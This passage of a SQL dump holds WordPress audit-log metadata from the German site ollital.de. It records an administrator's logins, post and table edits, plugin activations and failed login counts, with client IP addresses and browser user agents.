26.11.2015'),(1920,329,'PostUrl','http://www.ollital.de/wordpress/?p=386'),(1921,329,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=388'),(1922,329,'ClientIP','91.54.109.176'),(1923,329,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1924,329,'CurrentUserID','2'),(1925,329,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1926,330,'PostID','386'),(1927,330,'PostType','post'),(1928,330,'PostTitle','BA Gebäudemanagement am 26.11.2015'),(1929,330,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/ba-gebaudemanagement-am-26-11-2015/'),(1930,330,'ClientIP','91.54.109.176'),(1931,330,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1932,330,'CurrentUserID','2'),(1933,330,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1934,331,'PostID','386'),(1935,331,'PostType','post'),(1936,331,'PostTitle','GMW 26.11.2015'),(1937,331,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/ba-gebaudemanagement-am-26-11-2015/'),(1938,331,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=389'),(1939,331,'ClientIP','91.54.109.176'),(1940,331,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1941,331,'CurrentUserID','2'),(1942,331,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1943,332,'Username','Olli'),(1944,332,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1945,332,'ClientIP','91.54.109.176'),(1946,332,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1947,333,'PostID','386'),(1948,333,'PostType','post'),(1949,333,'PostTitle','BA Gebäudemanagement am 26.11.2015'),(1950,333,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/ba-gebaudemanagement-am-26-11-2015/'),(1951,333,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=389'),(1952,333,'ClientIP','91.54.109.176'),(1953,333,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1954,333,'CurrentUserID','2'),(1955,333,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1956,334,'PostID','386'),(1957,334,'PostType','post'),(1958,334,'PostTitle','BA Gebäudemanagement am 26.11.2015'),(1959,334,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/ba-gebaudemanagement-am-26-11-2015/'),(1960,334,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=390'),(1961,334,'ClientIP','91.54.109.176'),(1962,334,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1963,334,'CurrentUserID','2'),(1964,334,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1965,335,'PostID','386'),(1966,335,'PostType','post'),(1967,335,'PostTitle','BA Gebäudemanagement am 26.11.2015'),(1968,335,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/ba-gebaudemanagement-am-26-11-2015/'),(1969,335,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=391'),(1970,335,'ClientIP','91.54.109.176'),(1971,335,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1972,335,'CurrentUserID','2'),(1973,335,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1974,336,'Username','Olli'),(1975,336,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1976,336,'ClientIP','5.147.41.205'),(1977,336,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1978,337,'Username','Olli'),(1979,337,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1980,337,'ClientIP','5.147.41.205'),(1981,337,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1982,338,'PostID','380'),(1983,338,'PostType','tablepress_table'),(1984,338,'PostTitle','Abkürzungen'),(1985,338,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=380'),(1986,338,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=392'),(1987,338,'ClientIP','5.147.41.205'),(1988,338,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1989,338,'CurrentUserID','2'),(1990,338,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(1991,339,'PostID','386'),(1992,339,'PostType','post'),(1993,339,'PostTitle','BA Gebäudemanagement am 26.11.2015'),(1994,339,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/ba-gebaudemanagement-am-26-11-2015/'),(1995,339,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=393'),(1996,339,'ClientIP','5.147.41.205'),(1997,339,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(1998,339,'CurrentUserID','2'),(1999,339,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2000,340,'PostID','360'),(2001,340,'PostType','post'),(2002,340,'PostTitle','Auto Draft'),(2003,340,'ClientIP','81.169.187.232'),(2004,340,'UserAgent','WordPress/4.3.1; https://www.ollital.de/wordpress'),(2005,340,'CurrentUserID','0'),(2006,341,'PostID','361'),(2007,341,'PostType','post'),(2008,341,'PostTitle','Auto Draft'),(2009,341,'ClientIP','81.169.187.232'),(2010,341,'UserAgent','WordPress/4.3.1; https://www.ollital.de/wordpress'),(2011,341,'CurrentUserID','0'),(2012,342,'PostID','165'),(2013,342,'PostType','nav_menu_item'),(2014,342,'PostTitle','Home'),(2015,342,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/home/'),(2016,342,'RevisionLink',''),(2017,342,'ClientIP','195.128.40.90'),(2018,342,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2019,342,'CurrentUserID','2'),(2020,342,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2021,343,'PostID','167'),(2022,343,'PostType','nav_menu_item'),(2023,343,'PostTitle',''),(2024,343,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/167/'),(2025,343,'RevisionLink',''),(2026,343,'ClientIP','195.128.40.90'),(2027,343,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2028,343,'CurrentUserID','2'),(2029,343,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2030,344,'PostID','168'),(2031,344,'PostType','nav_menu_item'),(2032,344,'PostTitle',''),(2033,344,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/05/168/'),(2034,344,'RevisionLink',''),(2035,344,'ClientIP','195.128.40.90'),(2036,344,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2037,344,'CurrentUserID','2'),(2038,344,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2039,345,'PostID','384'),(2040,345,'PostType','nav_menu_item'),(2041,345,'PostTitle',''),(2042,345,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/384/'),(2043,345,'RevisionLink',''),(2044,345,'ClientIP','195.128.40.90'),(2045,345,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2046,345,'CurrentUserID','2'),(2047,345,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2048,346,'PostID','380'),(2049,346,'PostType','tablepress_table'),(2050,346,'PostTitle','Abkürzungen'),(2051,346,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=380'),(2052,346,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=395'),(2053,346,'ClientIP','195.128.40.90'),(2054,346,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2055,346,'CurrentUserID','2'),(2056,346,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2057,347,'Username','Olli'),(2058,347,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2059,347,'ClientIP','195.128.40.90'),(2060,347,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2061,348,'PostID','380'),(2062,348,'PostType','tablepress_table'),(2063,348,'PostTitle','Abkürzungen'),(2064,348,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=380'),(2065,348,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=396'),(2066,348,'ClientIP','195.128.40.90'),(2067,348,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2068,348,'CurrentUserID','2'),(2069,348,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2070,349,'Username','Olli'),(2071,349,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2072,349,'ClientIP','195.128.40.90'),(2073,349,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2074,350,'Attempts','1'),(2075,350,'ClientIP','192.0.102.35'),(2076,350,'UserAgent','Jetpack by WordPress.com'),(2077,350,'CurrentUserID','0'),(2078,351,'PluginFile','/var/www/wordpress/wp-content/plugins/advanced-ads/advanced-ads.php'),(2079,351,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:12:\"Advanced Ads\";s:9:\"PluginURI\";s:25:\"https://wpadvancedads.com\";s:7:\"Version\";s:6:\"1.6.13\";s:6:\"Author\";s:12:\"Thomas Maier\";s:7:\"Network\";s:5:\"False\";}'),(2080,351,'ClientIP','5.147.41.205'),(2081,351,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2082,351,'CurrentUserID','2'),(2083,351,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2084,352,'Username','Olli'),(2085,352,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2086,352,'ClientIP','5.147.41.205'),(2087,352,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2088,353,'Username','Olli'),(2089,353,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2090,353,'ClientIP','5.147.41.205'),(2091,353,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2092,354,'Username','Olli'),(2093,354,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2094,354,'ClientIP','5.147.41.205'),(2095,354,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2096,355,'Username','Olli'),(2097,355,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2098,355,'ClientIP','5.147.41.205'),(2099,355,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2100,356,'Username','Olli'),(2101,356,'CurrentUserRoles','a:1:{i:0;s:13:\"administrator\";}'),(2102,356,'ClientIP','5.147.41.205'),(2103,356,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2104,357,'Username','Olli'),(2105,357,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2106,357,'ClientIP','5.147.41.205'),(2107,357,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2108,358,'Attempts','3'),(2109,358,'Username','Olli'),(2110,358,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2111,358,'ClientIP','5.147.41.205'),(2112,358,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2113,359,'Username','Olli'),(2114,359,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2115,359,'ClientIP','5.147.41.205'),(2116,359,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2117,360,'Username','Olli'),(2118,360,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2119,360,'ClientIP','5.147.41.205'),(2120,360,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2121,361,'Username','Olli'),(2122,361,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2123,361,'ClientIP','5.147.41.205'),(2124,361,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2125,362,'Username','Olli'),(2126,362,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2127,362,'ClientIP','5.147.41.205'),(2128,362,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2129,363,'Attempts','1'),(2130,363,'ClientIP','5.147.41.205'),(2131,363,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2132,363,'CurrentUserID','0'),(2133,364,'Username','Olli'),(2134,364,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2135,364,'ClientIP','5.147.41.205'),(2136,364,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2137,365,'Username','Olli'),(2138,365,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2139,365,'ClientIP','5.147.41.205'),(2140,365,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2141,366,'Username','Olli'),(2142,366,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2143,366,'ClientIP','185.66.194.20'),(2144,366,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2145,367,'AttachmentID','397'),(2146,367,'FileName','120px-PIRATENsignet.png'),(2147,367,'FilePath','/var/www/wordpress/wp-content/uploads/2015/11'),(2148,367,'ClientIP','185.66.194.20'),(2149,367,'UserAgent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(2150,367,'CurrentUserID','2'),(2151,367,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2152,368,'Username','Olli'),(2153,368,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2154,368,'ClientIP','5.147.41.205'),(2155,368,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2156,369,'PostID','398'),(2157,369,'PostType','post'),(2158,369,'PostTitle','Auto Draft'),(2159,369,'OldDate','2015-11-28 22:57:36'),(2160,369,'NewDate','2015-11-28 22:58:10'),(2161,369,'ClientIP','5.147.41.205'),(2162,369,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2163,369,'CurrentUserID','2'),(2164,369,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2165,370,'PostID','398'),(2166,370,'PostType','post'),(2167,370,'PostTitle','Kreismitgliederversammlung 2015.1'),(2168,370,'PostUrl','http://www.ollital.de/wordpress/?p=398'),(2169,370,'RevisionLink',''),(2170,370,'ClientIP','5.147.41.205'),(2171,370,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2172,370,'CurrentUserID','2'),(2173,370,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2174,371,'PostID','398'),(2175,371,'PostType','post'),(2176,371,'PostTitle','Kreismitgliederversammlung 2015.1'),(2177,371,'PostUrl','http://www.ollital.de/wordpress/?p=398'),(2178,371,'RevisionLink',''),(2179,371,'ClientIP','5.147.41.205'),(2180,371,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2181,371,'CurrentUserID','2'),(2182,371,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2183,372,'PostID','398'),(2184,372,'PostType','post'),(2185,372,'PostTitle','Kreismitgliederversammlung 2015.1'),(2186,372,'PostUrl','http://www.ollital.de/wordpress/?p=398'),(2187,372,'ClientIP','5.147.41.205'),(2188,372,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2189,372,'CurrentUserID','2'),(2190,372,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2191,373,'PostID','398'),(2192,373,'PostType','post'),(2193,373,'PostTitle','Kreismitgliederversammlung 2015.1'),(2194,373,'PostUrl','http://www.ollital.de/wordpress/?p=398'),(2195,373,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=399'),(2196,373,'ClientIP','5.147.41.205'),(2197,373,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2198,373,'CurrentUserID','2'),(2199,373,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2200,374,'PostID','400'),(2201,374,'PostType','tablepress_table'),(2202,374,'PostTitle','Büropiratenwahl 2015'),(2203,374,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=400'),(2204,374,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=401'),(2205,374,'ClientIP','5.147.41.205'),(2206,374,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2207,374,'CurrentUserID','2'),(2208,374,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2209,375,'PostID','398'),(2210,375,'PostType','post'),(2211,375,'PostTitle','Kreismitgliederversammlung 2015.1'),(2212,375,'PostUrl','http://www.ollital.de/wordpress/?p=398'),(2213,375,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=399'),(2214,375,'ClientIP','5.147.41.205'),(2215,375,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2216,375,'CurrentUserID','2'),(2217,375,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2218,376,'PostID','398'),(2219,376,'PostType','post'),(2220,376,'PostTitle','Kreismitgliederversammlung 2015.1'),(2221,376,'PostUrl','http://www.ollital.de/wordpress/?p=398'),(2222,376,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=399'),(2223,376,'ClientIP','5.147.41.205'),(2224,376,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2225,376,'CurrentUserID','2'),(2226,376,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2227,377,'PostID','398'),(2228,377,'PostType','post'),(2229,377,'PostTitle','Kreismitgliederversammlung 2015.1'),(2230,377,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/kreismitgliederversammlung-2015-1/'),(2231,377,'ClientIP','5.147.41.205'),(2232,377,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2233,377,'CurrentUserID','2'),(2234,377,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2235,378,'PostID','398'),(2236,378,'PostType','post'),(2237,378,'PostTitle','Kreismitgliederversammlung 2015.1'),(2238,378,'PostUrl','http://www.ollital.de/wordpress/index.php/2015/11/kreismitgliederversammlung-2015-1/'),(2239,378,'RevisionLink','https://www.ollital.de/wordpress/wp-admin/revision.php?revision=402'),(2240,378,'ClientIP','5.147.41.205'),(2241,378,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2242,378,'CurrentUserID','2'),(2243,378,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2244,379,'Username','Olli'),(2245,379,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2246,379,'ClientIP','5.147.41.205'),(2247,379,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2248,380,'PostID','400'),(2249,380,'PostType','tablepress_table'),(2250,380,'PostTitle','Büropiratenwahl 2015'),(2251,380,'PostUrl','http://www.ollital.de/wordpress/?post_type=tablepress_table&p=400'),(2252,380,'RevisionLink','http://www.ollital.de/wordpress/wp-admin/revision.php?revision=401'),(2253,380,'ClientIP','5.147.41.205'),(2254,380,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2255,380,'CurrentUserID','2'),(2256,380,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2257,381,'Username','Olli'),(2258,381,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2259,381,'ClientIP','5.147.41.205'),(2260,381,'UserAgent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2261,382,'Username','Olli'),(2262,382,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2263,382,'ClientIP','194.99.144.7'),(2264,382,'UserAgent','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) CriOS/46.0.2490.85 Mobile/11D201 Safari/9537.53'),(2265,383,'PostID','362'),(2266,383,'PostType','post'),(2267,383,'PostTitle','Auto Draft'),(2268,383,'ClientIP','81.169.187.232'),(2269,383,'UserAgent','WordPress/4.3.1; https://www.ollital.de/wordpress'),(2270,383,'CurrentUserID','0'),(2271,384,'Attempts','9'),(2272,384,'Username','Olli'),(2273,384,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2274,384,'ClientIP','195.128.40.90'),(2275,384,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2276,385,'Username','Olli'),(2277,385,'CurrentUserRoles','a:1:{i:0;s:13:\"administrator\";}'),(2278,385,'ClientIP','109.44.0.160'),(2279,385,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36'),(2280,386,'Username','Olli'),(2281,386,'CurrentUserRoles','a:1:{i:0;s:13:\"administrator\";}'),(2282,386,'ClientIP','109.44.0.160'),(2283,386,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36'),(2284,387,'Username','Olli'),(2285,387,'CurrentUserRoles','a:1:{i:0;s:13:\"administrator\";}'),(2286,387,'ClientIP','109.44.0.160'),(2287,387,'UserAgent','Mozilla/5.0 (Linux; Android 5.0.2; PLK-L01 Build/HONORPLK-L01) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36'),(2288,388,'Username','Olli'),(2289,388,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2290,388,'ClientIP','195.128.40.90'),(2291,388,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2292,389,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(2293,389,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(2294,389,'ClientIP','195.128.40.90'),(2295,389,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2296,389,'CurrentUserID','2'),(2297,389,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2298,390,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(2299,390,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by WordPress.com\";s:9:\"PluginURI\";s:17:\"http://jetpack.me\";s:7:\"Version\";s:5:\"3.8.0\";s:6:\"Author\";s:10:\"Automattic\";s:7:\"Network\";s:5:\"False\";}'),(2300,390,'ClientIP','195.128.40.90'),(2301,390,'UserAgent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(2302,390,'CurrentUserID','2'),(2303,390,'CurrentUserRoles','a:2:{i:0;s:13:\"administrator\";i:1;s:10:\"superadmin\";}'),(2304,391,'PluginFile','/var/www/wordpress/wp-content/plugins/jetpack/jetpack.php'),(2305,391,'PluginData','O:8:\"stdClass\":5:{s:4:\"Name\";s:24:\"Jetpack by 